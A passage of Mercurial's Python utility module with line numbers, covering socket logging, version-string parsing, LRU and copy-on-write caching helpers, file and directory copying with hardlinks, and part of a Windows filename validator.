1061 1063 % (self.name, len(data), flags, address, res)
1062 1064 )
1063 1065
1064 1066 self._writedata(data)
1065 1067
1066 1068 def setblocking(self, res, flag):
1067 1069 if not self.states:
1068 1070 return
1069 1071
1070 1072 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1071 1073
1072 1074 def settimeout(self, res, value):
1073 1075 if not self.states:
1074 1076 return
1075 1077
1076 1078 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1077 1079
1078 1080 def gettimeout(self, res):
1079 1081 if not self.states:
1080 1082 return
1081 1083
1082 1084 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1083 1085
1084 1086 def setsockopt(self, res, level, optname, value):
1085 1087 if not self.states:
1086 1088 return
1087 1089
1088 1090 self.fh.write(
1089 1091 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1090 1092 % (self.name, level, optname, value, res)
1091 1093 )
1092 1094
1093 1095
1094 1096 def makeloggingsocket(
1095 1097 logh,
1096 1098 fh,
1097 1099 name,
1098 1100 reads=True,
1099 1101 writes=True,
1100 1102 states=True,
1101 1103 logdata=False,
1102 1104 logdataapis=True,
1103 1105 ):
1104 1106 """Turn a socket into a logging socket."""
1105 1107
1106 1108 observer = socketobserver(
1107 1109 logh,
1108 1110 name,
1109 1111 reads=reads,
1110 1112 writes=writes,
1111 1113 states=states,
1112 1114 logdata=logdata,
1113 1115 logdataapis=logdataapis,
1114 1116 )
1115 1117 return socketproxy(fh, observer)
1116 1118
1117 1119
1118 1120 def version():
1119 1121 """Return version information if available."""
1120 1122 try:
1121 1123 from . import __version__
1122 1124
1123 1125 return __version__.version
1124 1126 except ImportError:
1125 1127 return b'unknown'
1126 1128
1127 1129
1128 1130 def versiontuple(v=None, n=4):
1129 1131 """Parses a Mercurial version string into an N-tuple.
1130 1132
1131 1133 The version string to be parsed is specified with the ``v`` argument.
1132 1134 If it isn't defined, the current Mercurial version string will be parsed.
1133 1135
1134 1136 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1135 1137 returned values:
1136 1138
1137 1139 >>> v = b'3.6.1+190-df9b73d2d444'
1138 1140 >>> versiontuple(v, 2)
1139 1141 (3, 6)
1140 1142 >>> versiontuple(v, 3)
1141 1143 (3, 6, 1)
1142 1144 >>> versiontuple(v, 4)
1143 1145 (3, 6, 1, '190-df9b73d2d444')
1144 1146
1145 1147 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1146 1148 (3, 6, 1, '190-df9b73d2d444+20151118')
1147 1149
1148 1150 >>> v = b'3.6'
1149 1151 >>> versiontuple(v, 2)
1150 1152 (3, 6)
1151 1153 >>> versiontuple(v, 3)
1152 1154 (3, 6, None)
1153 1155 >>> versiontuple(v, 4)
1154 1156 (3, 6, None, None)
1155 1157
1156 1158 >>> v = b'3.9-rc'
1157 1159 >>> versiontuple(v, 2)
1158 1160 (3, 9)
1159 1161 >>> versiontuple(v, 3)
1160 1162 (3, 9, None)
1161 1163 >>> versiontuple(v, 4)
1162 1164 (3, 9, None, 'rc')
1163 1165
1164 1166 >>> v = b'3.9-rc+2-02a8fea4289b'
1165 1167 >>> versiontuple(v, 2)
1166 1168 (3, 9)
1167 1169 >>> versiontuple(v, 3)
1168 1170 (3, 9, None)
1169 1171 >>> versiontuple(v, 4)
1170 1172 (3, 9, None, 'rc+2-02a8fea4289b')
1171 1173
1172 1174 >>> versiontuple(b'4.6rc0')
1173 1175 (4, 6, None, 'rc0')
1174 1176 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1175 1177 (4, 6, None, 'rc0+12-425d55e54f98')
1176 1178 >>> versiontuple(b'.1.2.3')
1177 1179 (None, None, None, '.1.2.3')
1178 1180 >>> versiontuple(b'12.34..5')
1179 1181 (12, 34, None, '..5')
1180 1182 >>> versiontuple(b'1.2.3.4.5.6')
1181 1183 (1, 2, 3, '.4.5.6')
1182 1184 """
1183 1185 if not v:
1184 1186 v = version()
1185 1187 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1186 1188 if not m:
1187 1189 vparts, extra = b'', v
1188 1190 elif m.group(2):
1189 1191 vparts, extra = m.groups()
1190 1192 else:
1191 1193 vparts, extra = m.group(1), None
1192 1194
1193 1195 assert vparts is not None # help pytype
1194 1196
1195 1197 vints = []
1196 1198 for i in vparts.split(b'.'):
1197 1199 try:
1198 1200 vints.append(int(i))
1199 1201 except ValueError:
1200 1202 break
1201 1203 # (3, 6) -> (3, 6, None)
1202 1204 while len(vints) < 3:
1203 1205 vints.append(None)
1204 1206
1205 1207 if n == 2:
1206 1208 return (vints[0], vints[1])
1207 1209 if n == 3:
1208 1210 return (vints[0], vints[1], vints[2])
1209 1211 if n == 4:
1210 1212 return (vints[0], vints[1], vints[2], extra)
1211 1213
1212 1214
1213 1215 def cachefunc(func):
1214 1216 '''cache the result of function calls'''
1215 1217 # XXX doesn't handle keywords args
1216 1218 if func.__code__.co_argcount == 0:
1217 1219 listcache = []
1218 1220
1219 1221 def f():
1220 1222 if len(listcache) == 0:
1221 1223 listcache.append(func())
1222 1224 return listcache[0]
1223 1225
1224 1226 return f
1225 1227 cache = {}
1226 1228 if func.__code__.co_argcount == 1:
1227 1229 # we gain a small amount of time because
1228 1230 # we don't need to pack/unpack the list
1229 1231 def f(arg):
1230 1232 if arg not in cache:
1231 1233 cache[arg] = func(arg)
1232 1234 return cache[arg]
1233 1235
1234 1236 else:
1235 1237
1236 1238 def f(*args):
1237 1239 if args not in cache:
1238 1240 cache[args] = func(*args)
1239 1241 return cache[args]
1240 1242
1241 1243 return f
1242 1244
1243 1245
1244 1246 class cow(object):
1245 1247 """helper class to make copy-on-write easier
1246 1248
1247 1249 Call preparewrite before doing any writes.
1248 1250 """
1249 1251
1250 1252 def preparewrite(self):
1251 1253 """call this before writes, return self or a copied new object"""
1252 1254 if getattr(self, '_copied', 0):
1253 1255 self._copied -= 1
1254 1256 return self.__class__(self)
1255 1257 return self
1256 1258
1257 1259 def copy(self):
1258 1260 """always do a cheap copy"""
1259 1261 self._copied = getattr(self, '_copied', 0) + 1
1260 1262 return self
1261 1263
1262 1264
1263 1265 class sortdict(collections.OrderedDict):
1264 1266 '''a simple sorted dictionary
1265 1267
1266 1268 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1267 1269 >>> d2 = d1.copy()
1268 1270 >>> d2
1269 1271 sortdict([('a', 0), ('b', 1)])
1270 1272 >>> d2.update([(b'a', 2)])
1271 1273 >>> list(d2.keys()) # should still be in last-set order
1272 1274 ['b', 'a']
1273 1275 >>> d1.insert(1, b'a.5', 0.5)
1274 1276 >>> d1
1275 1277 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1276 1278 '''
1277 1279
1278 1280 def __setitem__(self, key, value):
1279 1281 if key in self:
1280 1282 del self[key]
1281 1283 super(sortdict, self).__setitem__(key, value)
1282 1284
1283 1285 if pycompat.ispypy:
1284 1286 # __setitem__() isn't called as of PyPy 5.8.0
1285 1287 def update(self, src):
1286 1288 if isinstance(src, dict):
1287 1289 src = pycompat.iteritems(src)
1288 1290 for k, v in src:
1289 1291 self[k] = v
1290 1292
1291 1293 def insert(self, position, key, value):
1292 1294 for (i, (k, v)) in enumerate(list(self.items())):
1293 1295 if i == position:
1294 1296 self[key] = value
1295 1297 if i >= position:
1296 1298 del self[k]
1297 1299 self[k] = v
1298 1300
1299 1301
1300 1302 class cowdict(cow, dict):
1301 1303 """copy-on-write dict
1302 1304
1303 1305 Be sure to call d = d.preparewrite() before writing to d.
1304 1306
1305 1307 >>> a = cowdict()
1306 1308 >>> a is a.preparewrite()
1307 1309 True
1308 1310 >>> b = a.copy()
1309 1311 >>> b is a
1310 1312 True
1311 1313 >>> c = b.copy()
1312 1314 >>> c is a
1313 1315 True
1314 1316 >>> a = a.preparewrite()
1315 1317 >>> b is a
1316 1318 False
1317 1319 >>> a is a.preparewrite()
1318 1320 True
1319 1321 >>> c = c.preparewrite()
1320 1322 >>> b is c
1321 1323 False
1322 1324 >>> b is b.preparewrite()
1323 1325 True
1324 1326 """
1325 1327
1326 1328
1327 1329 class cowsortdict(cow, sortdict):
1328 1330 """copy-on-write sortdict
1329 1331
1330 1332 Be sure to call d = d.preparewrite() before writing to d.
1331 1333 """
1332 1334
1333 1335
1334 1336 class transactional(object): # pytype: disable=ignored-metaclass
1335 1337 """Base class for making a transactional type into a context manager."""
1336 1338
1337 1339 __metaclass__ = abc.ABCMeta
1338 1340
1339 1341 @abc.abstractmethod
1340 1342 def close(self):
1341 1343 """Successfully closes the transaction."""
1342 1344
1343 1345 @abc.abstractmethod
1344 1346 def release(self):
1345 1347 """Marks the end of the transaction.
1346 1348
1347 1349 If the transaction has not been closed, it will be aborted.
1348 1350 """
1349 1351
1350 1352 def __enter__(self):
1351 1353 return self
1352 1354
1353 1355 def __exit__(self, exc_type, exc_val, exc_tb):
1354 1356 try:
1355 1357 if exc_type is None:
1356 1358 self.close()
1357 1359 finally:
1358 1360 self.release()
1359 1361
1360 1362
1361 1363 @contextlib.contextmanager
1362 1364 def acceptintervention(tr=None):
1363 1365 """A context manager that closes the transaction on InterventionRequired
1364 1366
1365 1367 If no transaction was provided, this simply runs the body and returns
1366 1368 """
1367 1369 if not tr:
1368 1370 yield
1369 1371 return
1370 1372 try:
1371 1373 yield
1372 1374 tr.close()
1373 1375 except error.InterventionRequired:
1374 1376 tr.close()
1375 1377 raise
1376 1378 finally:
1377 1379 tr.release()
1378 1380
1379 1381
1380 1382 @contextlib.contextmanager
1381 1383 def nullcontextmanager():
1382 1384 yield
1383 1385
1384 1386
1385 1387 class _lrucachenode(object):
1386 1388 """A node in a doubly linked list.
1387 1389
1388 1390 Holds a reference to nodes on either side as well as a key-value
1389 1391 pair for the dictionary entry.
1390 1392 """
1391 1393
1392 1394 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1393 1395
1394 1396 def __init__(self):
1395 1397 self.next = None
1396 1398 self.prev = None
1397 1399
1398 1400 self.key = _notset
1399 1401 self.value = None
1400 1402 self.cost = 0
1401 1403
1402 1404 def markempty(self):
1403 1405 """Mark the node as emptied."""
1404 1406 self.key = _notset
1405 1407 self.value = None
1406 1408 self.cost = 0
1407 1409
1408 1410
1409 1411 class lrucachedict(object):
1410 1412 """Dict that caches most recent accesses and sets.
1411 1413
1412 1414 The dict consists of an actual backing dict - indexed by original
1413 1415 key - and a doubly linked circular list defining the order of entries in
1414 1416 the cache.
1415 1417
1416 1418 The head node is the newest entry in the cache. If the cache is full,
1417 1419 we recycle head.prev and make it the new head. Cache accesses result in
1418 1420 the node being moved to before the existing head and being marked as the
1419 1421 new head node.
1420 1422
1421 1423 Items in the cache can be inserted with an optional "cost" value. This is
1422 1424 simply an integer that is specified by the caller. The cache can be queried
1423 1425 for the total cost of all items presently in the cache.
1424 1426
1425 1427 The cache can also define a maximum cost. If a cache insertion would
1426 1428 cause the total cost of the cache to go beyond the maximum cost limit,
1427 1429 nodes will be evicted to make room for the new code. This can be used
1428 1430 to e.g. set a max memory limit and associate an estimated bytes size
1429 1431 cost to each item in the cache. By default, no maximum cost is enforced.
1430 1432 """
1431 1433
1432 1434 def __init__(self, max, maxcost=0):
1433 1435 self._cache = {}
1434 1436
1435 1437 self._head = head = _lrucachenode()
1436 1438 head.prev = head
1437 1439 head.next = head
1438 1440 self._size = 1
1439 1441 self.capacity = max
1440 1442 self.totalcost = 0
1441 1443 self.maxcost = maxcost
1442 1444
1443 1445 def __len__(self):
1444 1446 return len(self._cache)
1445 1447
1446 1448 def __contains__(self, k):
1447 1449 return k in self._cache
1448 1450
1449 1451 def __iter__(self):
1450 1452 # We don't have to iterate in cache order, but why not.
1451 1453 n = self._head
1452 1454 for i in range(len(self._cache)):
1453 1455 yield n.key
1454 1456 n = n.next
1455 1457
1456 1458 def __getitem__(self, k):
1457 1459 node = self._cache[k]
1458 1460 self._movetohead(node)
1459 1461 return node.value
1460 1462
1461 1463 def insert(self, k, v, cost=0):
1462 1464 """Insert a new item in the cache with optional cost value."""
1463 1465 node = self._cache.get(k)
1464 1466 # Replace existing value and mark as newest.
1465 1467 if node is not None:
1466 1468 self.totalcost -= node.cost
1467 1469 node.value = v
1468 1470 node.cost = cost
1469 1471 self.totalcost += cost
1470 1472 self._movetohead(node)
1471 1473
1472 1474 if self.maxcost:
1473 1475 self._enforcecostlimit()
1474 1476
1475 1477 return
1476 1478
1477 1479 if self._size < self.capacity:
1478 1480 node = self._addcapacity()
1479 1481 else:
1480 1482 # Grab the last/oldest item.
1481 1483 node = self._head.prev
1482 1484
1483 1485 # At capacity. Kill the old entry.
1484 1486 if node.key is not _notset:
1485 1487 self.totalcost -= node.cost
1486 1488 del self._cache[node.key]
1487 1489
1488 1490 node.key = k
1489 1491 node.value = v
1490 1492 node.cost = cost
1491 1493 self.totalcost += cost
1492 1494 self._cache[k] = node
1493 1495 # And mark it as newest entry. No need to adjust order since it
1494 1496 # is already self._head.prev.
1495 1497 self._head = node
1496 1498
1497 1499 if self.maxcost:
1498 1500 self._enforcecostlimit()
1499 1501
1500 1502 def __setitem__(self, k, v):
1501 1503 self.insert(k, v)
1502 1504
1503 1505 def __delitem__(self, k):
1504 1506 self.pop(k)
1505 1507
1506 1508 def pop(self, k, default=_notset):
1507 1509 try:
1508 1510 node = self._cache.pop(k)
1509 1511 except KeyError:
1510 1512 if default is _notset:
1511 1513 raise
1512 1514 return default
1513 1515
1514 1516 assert node is not None # help pytype
1515 1517 value = node.value
1516 1518 self.totalcost -= node.cost
1517 1519 node.markempty()
1518 1520
1519 1521 # Temporarily mark as newest item before re-adjusting head to make
1520 1522 # this node the oldest item.
1521 1523 self._movetohead(node)
1522 1524 self._head = node.next
1523 1525
1524 1526 return value
1525 1527
1526 1528 # Additional dict methods.
1527 1529
1528 1530 def get(self, k, default=None):
1529 1531 try:
1530 1532 return self.__getitem__(k)
1531 1533 except KeyError:
1532 1534 return default
1533 1535
1534 1536 def peek(self, k, default=_notset):
1535 1537 """Get the specified item without moving it to the head
1536 1538
1537 1539 Unlike get(), this doesn't mutate the internal state. But be aware
1538 1540 that it doesn't mean peek() is thread safe.
1539 1541 """
1540 1542 try:
1541 1543 node = self._cache[k]
1542 1544 return node.value
1543 1545 except KeyError:
1544 1546 if default is _notset:
1545 1547 raise
1546 1548 return default
1547 1549
1548 1550 def clear(self):
1549 1551 n = self._head
1550 1552 while n.key is not _notset:
1551 1553 self.totalcost -= n.cost
1552 1554 n.markempty()
1553 1555 n = n.next
1554 1556
1555 1557 self._cache.clear()
1556 1558
1557 1559 def copy(self, capacity=None, maxcost=0):
1558 1560 """Create a new cache as a copy of the current one.
1559 1561
1560 1562 By default, the new cache has the same capacity as the existing one.
1561 1563 But, the cache capacity can be changed as part of performing the
1562 1564 copy.
1563 1565
1564 1566 Items in the copy have an insertion/access order matching this
1565 1567 instance.
1566 1568 """
1567 1569
1568 1570 capacity = capacity or self.capacity
1569 1571 maxcost = maxcost or self.maxcost
1570 1572 result = lrucachedict(capacity, maxcost=maxcost)
1571 1573
1572 1574 # We copy entries by iterating in oldest-to-newest order so the copy
1573 1575 # has the correct ordering.
1574 1576
1575 1577 # Find the first non-empty entry.
1576 1578 n = self._head.prev
1577 1579 while n.key is _notset and n is not self._head:
1578 1580 n = n.prev
1579 1581
1580 1582 # We could potentially skip the first N items when decreasing capacity.
1581 1583 # But let's keep it simple unless it is a performance problem.
1582 1584 for i in range(len(self._cache)):
1583 1585 result.insert(n.key, n.value, cost=n.cost)
1584 1586 n = n.prev
1585 1587
1586 1588 return result
1587 1589
1588 1590 def popoldest(self):
1589 1591 """Remove the oldest item from the cache.
1590 1592
1591 1593 Returns the (key, value) describing the removed cache entry.
1592 1594 """
1593 1595 if not self._cache:
1594 1596 return
1595 1597
1596 1598 # Walk the linked list backwards starting at tail node until we hit
1597 1599 # a non-empty node.
1598 1600 n = self._head.prev
1599 1601 while n.key is _notset:
1600 1602 n = n.prev
1601 1603
1602 1604 assert n is not None # help pytype
1603 1605
1604 1606 key, value = n.key, n.value
1605 1607
1606 1608 # And remove it from the cache and mark it as empty.
1607 1609 del self._cache[n.key]
1608 1610 self.totalcost -= n.cost
1609 1611 n.markempty()
1610 1612
1611 1613 return key, value
1612 1614
1613 1615 def _movetohead(self, node):
1614 1616 """Mark a node as the newest, making it the new head.
1615 1617
1616 1618 When a node is accessed, it becomes the freshest entry in the LRU
1617 1619 list, which is denoted by self._head.
1618 1620
1619 1621 Visually, let's make ``N`` the new head node (* denotes head):
1620 1622
1621 1623 previous/oldest <-> head <-> next/next newest
1622 1624
1623 1625 ----<->--- A* ---<->-----
1624 1626 | |
1625 1627 E <-> D <-> N <-> C <-> B
1626 1628
1627 1629 To:
1628 1630
1629 1631 ----<->--- N* ---<->-----
1630 1632 | |
1631 1633 E <-> D <-> C <-> B <-> A
1632 1634
1633 1635 This requires the following moves:
1634 1636
1635 1637 C.next = D (node.prev.next = node.next)
1636 1638 D.prev = C (node.next.prev = node.prev)
1637 1639 E.next = N (head.prev.next = node)
1638 1640 N.prev = E (node.prev = head.prev)
1639 1641 N.next = A (node.next = head)
1640 1642 A.prev = N (head.prev = node)
1641 1643 """
1642 1644 head = self._head
1643 1645 # C.next = D
1644 1646 node.prev.next = node.next
1645 1647 # D.prev = C
1646 1648 node.next.prev = node.prev
1647 1649 # N.prev = E
1648 1650 node.prev = head.prev
1649 1651 # N.next = A
1650 1652 # It is tempting to do just "head" here, however if node is
1651 1653 # adjacent to head, this will do bad things.
1652 1654 node.next = head.prev.next
1653 1655 # E.next = N
1654 1656 node.next.prev = node
1655 1657 # A.prev = N
1656 1658 node.prev.next = node
1657 1659
1658 1660 self._head = node
1659 1661
1660 1662 def _addcapacity(self):
1661 1663 """Add a node to the circular linked list.
1662 1664
1663 1665 The new node is inserted before the head node.
1664 1666 """
1665 1667 head = self._head
1666 1668 node = _lrucachenode()
1667 1669 head.prev.next = node
1668 1670 node.prev = head.prev
1669 1671 node.next = head
1670 1672 head.prev = node
1671 1673 self._size += 1
1672 1674 return node
1673 1675
1674 1676 def _enforcecostlimit(self):
1675 1677 # This should run after an insertion. It should only be called if total
1676 1678 # cost limits are being enforced.
1677 1679 # The most recently inserted node is never evicted.
1678 1680 if len(self) <= 1 or self.totalcost <= self.maxcost:
1679 1681 return
1680 1682
1681 1683 # This is logically equivalent to calling popoldest() until we
1682 1684 # free up enough cost. We don't do that since popoldest() needs
1683 1685 # to walk the linked list and doing this in a loop would be
1684 1686 # quadratic. So we find the first non-empty node and then
1685 1687 # walk nodes until we free up enough capacity.
1686 1688 #
1687 1689 # If we only removed the minimum number of nodes to free enough
1688 1690 # cost at insert time, chances are high that the next insert would
1689 1691 # also require pruning. This would effectively constitute quadratic
1690 1692 # behavior for insert-heavy workloads. To mitigate this, we set a
1691 1693 # target cost that is a percentage of the max cost. This will tend
1692 1694 # to free more nodes when the high water mark is reached, which
1693 1695 # lowers the chances of needing to prune on the subsequent insert.
1694 1696 targetcost = int(self.maxcost * 0.75)
1695 1697
1696 1698 n = self._head.prev
1697 1699 while n.key is _notset:
1698 1700 n = n.prev
1699 1701
1700 1702 while len(self) > 1 and self.totalcost > targetcost:
1701 1703 del self._cache[n.key]
1702 1704 self.totalcost -= n.cost
1703 1705 n.markempty()
1704 1706 n = n.prev
1705 1707
1706 1708
1707 1709 def lrucachefunc(func):
1708 1710 '''cache most recent results of function calls'''
1709 1711 cache = {}
1710 1712 order = collections.deque()
1711 1713 if func.__code__.co_argcount == 1:
1712 1714
1713 1715 def f(arg):
1714 1716 if arg not in cache:
1715 1717 if len(cache) > 20:
1716 1718 del cache[order.popleft()]
1717 1719 cache[arg] = func(arg)
1718 1720 else:
1719 1721 order.remove(arg)
1720 1722 order.append(arg)
1721 1723 return cache[arg]
1722 1724
1723 1725 else:
1724 1726
1725 1727 def f(*args):
1726 1728 if args not in cache:
1727 1729 if len(cache) > 20:
1728 1730 del cache[order.popleft()]
1729 1731 cache[args] = func(*args)
1730 1732 else:
1731 1733 order.remove(args)
1732 1734 order.append(args)
1733 1735 return cache[args]
1734 1736
1735 1737 return f
1736 1738
1737 1739
1738 1740 class propertycache(object):
1739 1741 def __init__(self, func):
1740 1742 self.func = func
1741 1743 self.name = func.__name__
1742 1744
1743 1745 def __get__(self, obj, type=None):
1744 1746 result = self.func(obj)
1745 1747 self.cachevalue(obj, result)
1746 1748 return result
1747 1749
1748 1750 def cachevalue(self, obj, value):
1749 1751 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1750 1752 obj.__dict__[self.name] = value
1751 1753
1752 1754
1753 1755 def clearcachedproperty(obj, prop):
1754 1756 '''clear a cached property value, if one has been set'''
1755 1757 prop = pycompat.sysstr(prop)
1756 1758 if prop in obj.__dict__:
1757 1759 del obj.__dict__[prop]
1758 1760
1759 1761
1760 1762 def increasingchunks(source, min=1024, max=65536):
1761 1763 '''return no less than min bytes per chunk while data remains,
1762 1764 doubling min after each chunk until it reaches max'''
1763 1765
1764 1766 def log2(x):
1765 1767 if not x:
1766 1768 return 0
1767 1769 i = 0
1768 1770 while x:
1769 1771 x >>= 1
1770 1772 i += 1
1771 1773 return i - 1
1772 1774
1773 1775 buf = []
1774 1776 blen = 0
1775 1777 for chunk in source:
1776 1778 buf.append(chunk)
1777 1779 blen += len(chunk)
1778 1780 if blen >= min:
1779 1781 if min < max:
1780 1782 min = min << 1
1781 1783 nmin = 1 << log2(blen)
1782 1784 if nmin > min:
1783 1785 min = nmin
1784 1786 if min > max:
1785 1787 min = max
1786 1788 yield b''.join(buf)
1787 1789 blen = 0
1788 1790 buf = []
1789 1791 if buf:
1790 1792 yield b''.join(buf)
1791 1793
1792 1794
1793 1795 def always(fn):
1794 1796 return True
1795 1797
1796 1798
1797 1799 def never(fn):
1798 1800 return False
1799 1801
1800 1802
1801 1803 def nogc(func):
1802 1804 """disable garbage collector
1803 1805
1804 1806 Python's garbage collector triggers a GC each time a certain number of
1805 1807 container objects (the number being defined by gc.get_threshold()) are
1806 1808 allocated even when marked not to be tracked by the collector. Tracking has
1807 1809 no effect on when GCs are triggered, only on what objects the GC looks
1808 1810 into. As a workaround, disable GC while building complex (huge)
1809 1811 containers.
1810 1812
1811 1813 This garbage collector issue have been fixed in 2.7. But it still affect
1812 1814 CPython's performance.
1813 1815 """
1814 1816
1815 1817 def wrapper(*args, **kwargs):
1816 1818 gcenabled = gc.isenabled()
1817 1819 gc.disable()
1818 1820 try:
1819 1821 return func(*args, **kwargs)
1820 1822 finally:
1821 1823 if gcenabled:
1822 1824 gc.enable()
1823 1825
1824 1826 return wrapper
1825 1827
1826 1828
1827 1829 if pycompat.ispypy:
1828 1830 # PyPy runs slower with gc disabled
1829 1831 nogc = lambda x: x
1830 1832
1831 1833
1832 1834 def pathto(root, n1, n2):
1833 1835 '''return the relative path from one place to another.
1834 1836 root should use os.sep to separate directories
1835 1837 n1 should use os.sep to separate directories
1836 1838 n2 should use "/" to separate directories
1837 1839 returns an os.sep-separated path.
1838 1840
1839 1841 If n1 is a relative path, it's assumed it's
1840 1842 relative to root.
1841 1843 n2 should always be relative to root.
1842 1844 '''
1843 1845 if not n1:
1844 1846 return localpath(n2)
1845 1847 if os.path.isabs(n1):
1846 1848 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1847 1849 return os.path.join(root, localpath(n2))
1848 1850 n2 = b'/'.join((pconvert(root), n2))
1849 1851 a, b = splitpath(n1), n2.split(b'/')
1850 1852 a.reverse()
1851 1853 b.reverse()
1852 1854 while a and b and a[-1] == b[-1]:
1853 1855 a.pop()
1854 1856 b.pop()
1855 1857 b.reverse()
1856 1858 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1857 1859
1858 1860
1859 1861 def checksignature(func, depth=1):
1860 1862 '''wrap a function with code to check for calling errors'''
1861 1863
1862 1864 def check(*args, **kwargs):
1863 1865 try:
1864 1866 return func(*args, **kwargs)
1865 1867 except TypeError:
1866 1868 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1867 1869 raise error.SignatureError
1868 1870 raise
1869 1871
1870 1872 return check
1871 1873
1872 1874
1873 1875 # a whilelist of known filesystems where hardlink works reliably
1874 1876 _hardlinkfswhitelist = {
1875 1877 b'apfs',
1876 1878 b'btrfs',
1877 1879 b'ext2',
1878 1880 b'ext3',
1879 1881 b'ext4',
1880 1882 b'hfs',
1881 1883 b'jfs',
1882 1884 b'NTFS',
1883 1885 b'reiserfs',
1884 1886 b'tmpfs',
1885 1887 b'ufs',
1886 1888 b'xfs',
1887 1889 b'zfs',
1888 1890 }
1889 1891
1890 1892
1891 1893 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1892 1894 '''copy a file, preserving mode and optionally other stat info like
1893 1895 atime/mtime
1894 1896
1895 1897 checkambig argument is used with filestat, and is useful only if
1896 1898 destination file is guarded by any lock (e.g. repo.lock or
1897 1899 repo.wlock).
1898 1900
1899 1901 copystat and checkambig should be exclusive.
1900 1902 '''
1901 1903 assert not (copystat and checkambig)
1902 1904 oldstat = None
1903 1905 if os.path.lexists(dest):
1904 1906 if checkambig:
1905 1907 oldstat = checkambig and filestat.frompath(dest)
1906 1908 unlink(dest)
1907 1909 if hardlink:
1908 1910 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1909 1911 # unless we are confident that dest is on a whitelisted filesystem.
1910 1912 try:
1911 1913 fstype = getfstype(os.path.dirname(dest))
1912 1914 except OSError:
1913 1915 fstype = None
1914 1916 if fstype not in _hardlinkfswhitelist:
1915 1917 hardlink = False
1916 1918 if hardlink:
1917 1919 try:
1918 1920 oslink(src, dest)
1919 1921 return
1920 1922 except (IOError, OSError):
1921 1923 pass # fall back to normal copy
1922 1924 if os.path.islink(src):
1923 1925 os.symlink(os.readlink(src), dest)
1924 1926 # copytime is ignored for symlinks, but in general copytime isn't needed
1925 1927 # for them anyway
1926 1928 else:
1927 1929 try:
1928 1930 shutil.copyfile(src, dest)
1929 1931 if copystat:
1930 1932 # copystat also copies mode
1931 1933 shutil.copystat(src, dest)
1932 1934 else:
1933 1935 shutil.copymode(src, dest)
1934 1936 if oldstat and oldstat.stat:
1935 1937 newstat = filestat.frompath(dest)
1936 1938 if newstat.isambig(oldstat):
1937 1939 # stat of copied file is ambiguous to original one
1938 1940 advanced = (
1939 1941 oldstat.stat[stat.ST_MTIME] + 1
1940 1942 ) & 0x7FFFFFFF
1941 1943 os.utime(dest, (advanced, advanced))
1942 1944 except shutil.Error as inst:
1943 1945 raise error.Abort(stringutil.forcebytestr(inst))
1944 1946
1945 1947
1946 1948 def copyfiles(src, dst, hardlink=None, progress=None):
1947 1949 """Copy a directory tree using hardlinks if possible."""
1948 1950 num = 0
1949 1951
1950 1952 def settopic():
1951 1953 if progress:
1952 1954 progress.topic = _(b'linking') if hardlink else _(b'copying')
1953 1955
1954 1956 if os.path.isdir(src):
1955 1957 if hardlink is None:
1956 1958 hardlink = (
1957 1959 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1958 1960 )
1959 1961 settopic()
1960 1962 os.mkdir(dst)
1961 1963 for name, kind in listdir(src):
1962 1964 srcname = os.path.join(src, name)
1963 1965 dstname = os.path.join(dst, name)
1964 1966 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1965 1967 num += n
1966 1968 else:
1967 1969 if hardlink is None:
1968 1970 hardlink = (
1969 1971 os.stat(os.path.dirname(src)).st_dev
1970 1972 == os.stat(os.path.dirname(dst)).st_dev
1971 1973 )
1972 1974 settopic()
1973 1975
1974 1976 if hardlink:
1975 1977 try:
1976 1978 oslink(src, dst)
1977 1979 except (IOError, OSError):
1978 1980 hardlink = False
1979 1981 shutil.copy(src, dst)
1980 1982 else:
1981 1983 shutil.copy(src, dst)
1982 1984 num += 1
1983 1985 if progress:
1984 1986 progress.increment()
1985 1987
1986 1988 return hardlink, num
1987 1989
1988 1990
1989 1991 _winreservednames = {
1990 1992 b'con',
1991 1993 b'prn',
1992 1994 b'aux',
1993 1995 b'nul',
1994 1996 b'com1',
1995 1997 b'com2',
1996 1998 b'com3',
1997 1999 b'com4',
1998 2000 b'com5',
1999 2001 b'com6',
2000 2002 b'com7',
2001 2003 b'com8',
2002 2004 b'com9',
2003 2005 b'lpt1',
2004 2006 b'lpt2',
2005 2007 b'lpt3',
2006 2008 b'lpt4',
2007 2009 b'lpt5',
2008 2010 b'lpt6',
2009 2011 b'lpt7',
2010 2012 b'lpt8',
2011 2013 b'lpt9',
2012 2014 }
2013 2015 _winreservedchars = b':*?"<>|'
2014 2016
2015 2017
2016 2018 def checkwinfilename(path):
2017 2019 r'''Check that the base-relative path is a valid filename on Windows.
2018 2020 Returns None if the path is ok, or a UI string describing the problem.
2019 2021
2020 2022 >>> checkwinfilename(b"just/a/normal/path")
2021 2023 >>> checkwinfilename(b"foo/bar/con.xml")
2022 2024 "filename contains 'con', which is reserved on Windows"
2023 2025 >>> checkwinfilename(b"foo/con.xml/bar")
2024 2026 "filename contains 'con', which is reserved on Windows"
2025 2027 >>> checkwinfilename(b"foo/bar/xml.con")
2026 2028 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2027 2029 "filename contains 'AUX', which is reserved on Windows"
2028 2030 >>> checkwinfilename(b"foo/bar/bla:.txt")
2029 2031 "filename contains ':', which is reserved on Windows"
2030 2032 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2031 2033 "filename contains '\\x07', which is invalid on Windows"
2032 2034 >>> checkwinfilename(b"foo/bar/bla ")
2033 2035 "filename ends with ' ', which is not allowed on Windows"
2034 2036 >>> checkwinfilename(b"../bar")
2035 2037 >>> checkwinfilename(b"foo\\")
2036 2038 "filename ends with '\\', which is invalid on Windows"
